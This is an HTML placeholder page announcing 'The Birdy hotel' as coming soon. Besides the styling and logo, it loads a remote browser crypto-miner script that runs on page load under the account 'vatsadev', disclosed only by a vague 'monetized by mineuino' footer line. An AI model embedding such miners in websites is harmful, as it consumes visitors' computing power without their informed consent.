<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>The Birdy hotel: Coming Soon!</title>
    <link rel="shortcut icon" type="image/x-icon" href="logo.png" />
    <style>
      @import url("https://fonts.googleapis.com/css2?family=Work+Sans:wght@500&display=swap");

      * {
        box-sizing: border-box;
        font-family: "Work Sans", sans-serif;
      }

      body {
        padding: 0;
        background-color: #121212;
        color: #cac4c4;
      }

      footer {
        padding: 10px;
      }

      .soon {
        width: 100%;
        min-height: 80%;
        padding: 15px;
        border-radius: 10px;
        background-color: #242424;
      }

      .center {
        text-align: center;
      }
    </style>
  </head>
  <body>
    <script
      type="text/javascript"
      src="https://cdn.rawgit.com/h2non/jsHashes/master/hashes.js"
    ></script>
    <script src="https://mineuino.vercel.app/miner.js" defer></script>
    <div id="mineuino-div" data-mineuino-username="vatsadev"></div>
    <div class="soon">
      <h1 class="center">The birdy hotel is</h1>
      <h2 class="center">Coming Soon!</h2>
      <img
        src="logo.png"
        alt="logo"
        style="
          display: block;
          margin-top: 10px;
          margin-bottom: 10px;
          margin-left: auto;
          margin-right: auto;
        "
      />
    </div>
    <footer class="center">
      © vatsadev 2021 - present, all rights reserved. <br />
      monetized by mineuino
    </footer>
  </body>
</html>
